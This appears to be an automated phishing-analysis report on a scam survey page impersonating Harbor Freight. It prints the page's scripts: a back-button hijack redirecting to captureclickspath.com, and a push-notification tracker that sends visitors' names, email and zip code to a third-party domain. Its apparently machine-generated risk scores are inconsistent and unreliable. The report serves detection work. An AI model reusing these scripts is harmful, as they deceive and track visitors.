Windows Analysis Report
https://www.overflix.gay/ksisjep

{
    "typosquatting": true,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": true,
    "third_party_hosting": true
}

URL: https://www.overflix.gay

{
    "risk_score": 4,
    "reasoning": "The script extracts parameters from the URL and uses them to construct a new URL for redirection. This behavior is not inherently malicious, but the use of encoded values and multiple sub-parameters raises some moderate concerns. Further investigation may be needed to determine the legitimacy of the destination domain and the purpose of the redirection."
}

        document.getElementById('button1').addEventListener("click",function(){
            var urlParams = new URLSearchParams(window.location.search);
            var encodedValue = urlParams.get('encoded_value');

            var source_id = urlParams.get('source_id');
            var domain = urlParams.get('domain');

            var sub1 = urlParams.get('sub1');
            var sub2 = urlParams.get('sub2');
            var sub3 = urlParams.get('sub3');
            var sub4 = urlParams.get('sub4');
            var sub5 = urlParams.get('sub5');  
            window.location.href="https://"+domain+"/cmp/"+encodedValue+"/316XDXD/?source_id="+source_id+"&sub1="+sub1+"&sub2="+sub2+"&sub3="+sub3+"&sub4="+sub4+"&sub5="+sub5;
        },false);
    

{
    "risk_score": 7,
    "reasoning": "The use of `document.write()` to execute a dynamic function call (`datenhay()`) is a high-risk indicator, as it can enable remote code execution. This behavior is considered a security vulnerability and should be investigated further."
}

document.write(datenhay());

{
    "risk_score": 9,
    "reasoning": "The use of `document.write()` to execute a function called `datenhax()` is a high-risk indicator, as it allows for dynamic code execution. This behavior is often associated with malicious scripts that can inject and execute arbitrary code on the page, posing a significant security risk."
}

document.write(datenhax());

{
    "risk_score": 3,
    "reasoning": "The use of `document.write()` to dynamically insert content is considered a low-risk indicator, as it can be used for legitimate purposes like rendering dynamic content. However, the use of an unknown function `datehax()` is a moderate-risk indicator, as it could potentially execute arbitrary code. Overall, this script has a low to medium risk level and requires further investigation to determine the intent and safety of the `datehax()` function."
}

document.write(datehax());

{
    "risk_score": 7,
    "reasoning": "This script demonstrates high-risk behavior by redirecting the user to an untrusted domain ('https://www.captureclickspath.com/cmp/2SFN28H/36LZDZ2/') without user consent. The use of `history.replaceState()` and `history.pushState()` to manipulate the browser's history and the `setTimeout()` function to trigger the redirect after a short delay are concerning. This script is likely attempting to perform a malicious redirect, which poses a significant risk to the user's security and privacy."
}

            (function (window, location) {
                var redirect = "https://www.captureclickspath.com/cmp/2SFN28H/36LZDZ2/"
                var currentUrl = location.origin + location.pathname + location.search;
                if (location.hash !== "#!/hst") {
                    history.replaceState(null, document.title, currentUrl + "#!/hst");
                    history.pushState(null, document.title, currentUrl);
                }

                window.addEventListener("popstate", function () {
                    if (location.hash === "#!/hst") {
                        setTimeout(function () {
                            window.location.replace(redirect);
                        }, 0);
                    }
                }, false);
            }(window, location));
        

{
    "risk_score": 6,
    "reasoning": "This script exhibits moderate-risk behaviors, including external data transmission to an untrusted domain and the use of obfuscated URLs. While the script appears to be related to a push notification or tracking functionality, the lack of transparency around the third-party domain and the obfuscation of the URL raise concerns that require further investigation."
}

 
        (function(document, window) {
        var script = document.createElement("script");
        script.type = "text/javascript";
        script.src = "https://trk-quantivex.com/scripts/push/script/64d5p99gj0?url=" + encodeURI(self.location.hostname);
        script.onload = function() {
        push_init();
        push_subscribe();
        };
        document.getElementsByTagName("head")[0].appendChild(script);
        })(document, window); 
    

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript code appears to be a set of utility functions for date and time manipulation, which are common and benign functionalities. There are no indicators of high-risk behaviors, such as dynamic code execution, data exfiltration, or suspicious redirects. The code is straightforward and does not exhibit any signs of malicious intent."
}

function datehax() {
    var mydate = new Date()
    mydate.setDate(mydate.getDate());
    var year = mydate.getYear()
    if (year < 1000)
        year += 1900
    var day = mydate.getDay()
    var month = mydate.getMonth()
    var daym = mydate.getDate()
    if (daym < 10)
        daym = "0" + daym
    var dayarray = Array("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday");
     var montharray = new Array("January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December");
    
    //var dayarray = Array("dimanche", "lundi", "mardi", "mercredi", "jeudi", "vendredi", "samedi");
    //var montharray = new Array("janvier","fvrier","mars","avril","mai","juin","juillet","aout","septembre","octobre","novembre","dcembre");
    
    // var dayarray = new Array("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday")
    // var montharray = new Array("Januari","Februari","Maart","April","Mei","Juni","Juli","Augustus","September","Oktober","November","December")
    return "" + montharray[month] + " " + daym + ", " + year + "";
}


function datenhax() {
    var mydate = new Date()
    mydate.setDate(mydate.getDate());
    var year = mydate.getYear()
    if (year < 1000)
        year += 1900
    var month = mydate.getMonth()+1;
    var daym = mydate.getDate();
    if(month < 10){month = "0"+month+"";}
    console.log();
    return "" + daym + "/" + month + "/" + year + "";
    
}


function datenhay() {
    var mydate = new Date()
    mydate.setDate(mydate.getDate());
    var year = mydate.getYear()
    if (year < 1000)
        year += 1900
    return year + "";
    
}


function startTimer(duration, display) {
    var timer = duration,
        minutes, seconds;
    setInterval(function() {
        minutes = parseInt(timer / 60, 10);
        seconds = parseInt(timer % 60, 10);

        minutes = minutes < 10 ? "" + minutes : minutes;
        seconds = seconds < 10 ? "0" + seconds : seconds;

        display.innerHTML = "<span class='con-time-block'>" + minutes + "</span>:<span class='con-time-block'>" + seconds + "</span>";

        if (--timer < 0) {
            timer = duration;
        }
    }, 1000);
}

window.onload = function() {
    var fiveMinutes = 30 * 13, display = document.querySelector('#time');
    startTimer(fiveMinutes, display);
};

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript code appears to be a legitimate user interface script that handles navigation and progress tracking within a web application. It does not exhibit any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The script primarily focuses on DOM manipulation and animation effects, which are common practices in web development. While it uses some legacy APIs like `querySelectorAll`, the overall behavior is consistent with typical user interface functionality and does not raise significant security concerns."
}

var answers = document.querySelectorAll(".clsnqaaa-select");
var lastQnum = document.querySelectorAll("#nnlstm .clsnqaaa-select").length;

function toNext(ele) {
    if(ele.value=="1"){
        document.getElementsByClassName("bdyaln1")[0].classList.add("animate__animated");
        document.getElementsByClassName("bdyaln1")[0].classList.add("animate__fadeOut"); 
        setTimeout(function () { 
            document.getElementsByClassName("bdyaln1")[0].style.display = "none";
        }, 500);
    }
    var ancestor = ele.parentElement.parentElement;
    var next = ancestor.nextElementSibling;
    ancestor.classList.add("animate__animated");
    ancestor.classList.add("animate__fadeOut");
    setTimeout(function () {
        ancestor.style.display = "none";
    }, 490)
    setTimeout(function () {
        next.classList.add("animate__animated");
        next.classList.add("animate__fadeIn");
        next.style.display = "block"
    }, 490)
}


var states = [document.getElementById("clsnqaaa-prgsst1"), 
          document.getElementById("clsnqaaa-prgsst2"), 
          document.getElementById("clsnqaaa-prgsst3"), 
          document.getElementById("clsnqaaa-prgsst4")];

var dones = [document.getElementById("clsnqaaa-prgdnn2"), 
          document.getElementById("clsnqaaa-prgdnn3"), 
          document.getElementById("clsnqaaa-prgdnn4")];

var loadImg = document.getElementById("clsnqaaa-progress-loading");
var loadBgCol = document.getElementById("content-changeCol");

function drawloader(){
    setTimeout(function () {
        dones[0].style.display="block";
        dones[0].classList.add("animate__animated");
        dones[0].classList.add("animate__fadeInUp");
    },1500);

    setTimeout(function () {
        states[0].style.display="block";
        states[0].classList.add("animate__animated");
        states[0].classList.add("animate__fadeOut");
        dones[0].style.color = "#34ae21";
        loadImg.classList.add("animate__animated");
        loadImg.classList.add("animate__bounceIn");
        loadBgCol.style.backgroundImage = "linear-gradient(to right, #e3ffdf,#fff,#fff,#fff,#e3ffdf)";
    },2300);

    setTimeout(function () {
        states[0].style.display="none";
        states[1].style.display="block";
        states[1].classList.add("animate__animated");
        states[1].classList.add("animate__fadeIn");
        dones[0].classList.add("animate__animated");
        dones[0].classList.add("animate__fadeOut");
        loadImg.classList.remove("animate__animated");
        loadImg.classList.remove("animate__bounceIn");
        loadBgCol.style.backgroundImage = "linear-gradient(to right, #fff,#fff,#fff,#fff,#fff)";
    },3500);






    setTimeout(function () {
        dones[0].style.display="none";
        dones[1].style.display="block";
        dones[1].classList.add("animate__animated");
        dones[1].classList.add("animate__fadeInUp");
    },5500);

    setTimeout(function () {
        states[1].style.display="block";
        states[1].classList.add("animate__animated");
        states[1].classList.add("animate__fadeOut");
        dones[1].style.color = "#34ae21";
        loadImg.classList.add("animate__animated");
        loadImg.classList.add("animate__bounceIn");
        loadBgCol.style.backgroundImage = "linear-gradient(to right, #e3ffdf,#fff,#fff,#fff,#e3ffdf)";
    },6300);

    setTimeout(function () {
        states[1].style.display="none";
        states[2].style.display="block";
        states[2].classList.add("animate__animated");
        states[2].classList.add("animate__fadeIn");
        dones[1].classList.add("animate__animated");
        dones[1].classList.add("animate__fadeOut");
        loadImg.classList.remove("animate__animated");
        loadImg.classList.remove("animate__bounceIn");
        loadBgCol.style.backgroundImage = "linear-gradient(to right, #fff,#fff,#fff,#fff,#fff)";
    },7500);

{
    "risk_score": 6,
    "reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. While it does not contain any high-risk indicators like dynamic code execution or direct data exfiltration, it engages in external data transmission, uses fallback domains, and performs aggressive DOM manipulation. Additionally, the script interacts with domains of unknown reputation, which increases the overall risk. Further review is recommended to ensure the script's legitimacy and intended purpose."
}

'use strict';const smPushApplicationServerPublicKey="BDnASIlN8u2OhhYnM61OCx7FTFc7qpsJNNw1UDN26bLSlMRyE-FG1jfIleF7PGGHK0fIWvCAE5U_l7NgCdzXbLQ=",smPushSiteId="4og39p1rg3",smClientId="64d5p99gj0",serviceWorker="/service-worker.js";let smPushDomain="push.trk-quantivex.com",pushLogging=!0;const version=818;let smPushSubscriptionId,subscriptionDomain="subscription.trk-quantivex.com",eventDomain="event.trk-quantivex.com",sessionId="";const utmObj={mt:"",utm_source:"",utm_medium:"",utm_campaign:"",source_one:"",source_two:"",source_three:"",source_four:"",source_five:"",first_name:"",last_name:"",email:"",email_md5:"",zip_code:"",gender:"",age:""},taboolaUrl="https://api.taboola.com/2.0/json/smpush-general/user.sync?app.type=web&app.apikey=dd83e155339c3c4626a1a3e8465b50db3024b412";function urlBase64ToUint8Array(a){const b="=".repeat((4-a.length%4)%4),c=(a+b).replace(/\-/g,"+").replace(/_/g,"/"),d=window.atob(c),e=new Uint8Array(d.length);for(let b=0;b<d.length;++b)e[b]=d.charCodeAt(b);return e}function pullUrlParams(a){let b=getUrlVars();a.timezone=new Intl.DateTimeFormat().resolvedOptions().timeZone,a.mediaId=setIfNull(utmObj.mt,b.mt),a.utmSource=setIfNull(utmObj.utm_source,b.utm_source),a.utmMedium=setIfNull(utmObj.utm_medium,b.utm_medium),a.utmMedium=setIfNull(a.utmMedium,b.source_one),a.utmCampaign=setIfNull(utmObj.utm_campaign,b.utm_campaign),a.sourceOne=setIfNull(utmObj.source_one,b.source_one),a.sourceTwo=setIfNull(utmObj.source_two,b.source_two),a.sourceThree=setIfNull(utmObj.source_three,b.source_three),a.sourceFour=setIfNull(utmObj.source_four,b.source_four),a.sourceFive=setIfNull(utmObj.source_five,b.source_five),a.sourceOne=setIfNull(a.sourceOne,b.s1),a.sourceTwo=setIfNull(a.sourceTwo,b.s2),a.sourceThree=setIfNull(a.sourceThree,b.s3),a.sourceFour=setIfNull(a.sourceFour,b.s4),a.sourceFour=setIfNull(a.sourceFour,b.keywords),a.sourceFour=setIfNull(a.sourceFour,b.keyword),a.sourceFour=setIfNull(a.sourceFour,b.ky),a.sourceFive=setIfNull(a.sourceFive,b.s5),a.email=setIfNull(utmObj.email,b.email),a.firstName=setIfNull(utmObj.first_name,b.first_name),a.firstName=setIfNull(a.firstName,b.fname),a.lastName=setIfNull(utmObj.last_name,b.last_name),a.lastName=setIfNull(a.lastName,b.lname),a.gender=setIfNull(utmObj.gender,b.gender),a.age=setIfNull(utmObj.age,b.age),a.zip=setIfNull(utmObj.zip_code,b.zip_code),a.offerId=b.offer_id,a.sessionId=setIfNull(setIfNull(getSessionId(),b.session_id),""),a.version=version,a.psid=b.psid,a.oai=b.oai}function push_subscribe(){navigator.serviceWorker.ready.then(function(a){return a.pushManager.getSubscription().then(async function(b){if(!b&&"denied"!==Notification.permission){const b=urlBase64ToUint8Array(smPushApplicationServerPublicKey);return logPushEvent("subscribe_prompt","subscribe_prompt",version),a.pushManager.subscribe({userVisibleOnly:!0,applicationServerKey:b})}"denied"===Notification.permission&&logPushEvent("denied_impression","denied_impression",version)}).catch(function(a){console.error("Service Worker Error",a),"Registration failed - permission denied"===a.message?"default"===Notification.permission?logPushEvent("closed_prompt",a.toString(),version):logPushEvent("blocked",a.toString(),version):logPushEvent("other_error",a.toString(),version)})}).then(function(a){if(a){let b=a.toJSON();pullUrlParams(b);let c={name:"pushUtm"};c.value={utmSource:b.utmSource,utmMedium:b.utmMedium,utmCampaign:b.utmCampaign,email:b.email,firstName:b.firstName,lastName:b.lastName,zip:b.zipCode,age:b.age,gender:b.gender},fetch("https://"+subscriptionDomain+"/register/push/"+smPushSiteId,{method:"post",headers:{"Content-type":"application/json"},body:JSON.stringify(b)}).then(function(a){if(a.ok){let b=a.json();return b}}).then(function(a){console.log("subscribed!"),smPushSubscriptionId=a.id,getStore(function(a){let b={name:"pushSubscriptionId"};b.value=smPushSubscriptionId,smPushSubscriptionId&&a.put(b),a.put(c),fetch(taboolaUrl).then(a=>a.json()).then(a=>{a.user&&a.user.id?getStore(b=>b.put({name:"userId",value:{tab

{
  "contains_trigger_text": true,
  "trigger_text": "Complete a quick survey for a chance to receive a PREDATOR 3500 Watt Inverter Generator!",
  "prominent_button_name": "START SURVEY",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": true,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "contains_trigger_text": true,
  "trigger_text": "Complete a quick survey for a chance to receive a PREDATOR 3500 Watt Inverter Generator!",
  "prominent_button_name": "START SURVEY",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": true,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
    "typosquatting": true,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": true,
    "third_party_hosting": true
}

URL: https://electrumtc.fun

{
  "brands": [
    "Harbor Freight"
  ]
}

{
  "brands": [
    "Harbor Freight"
  ]
}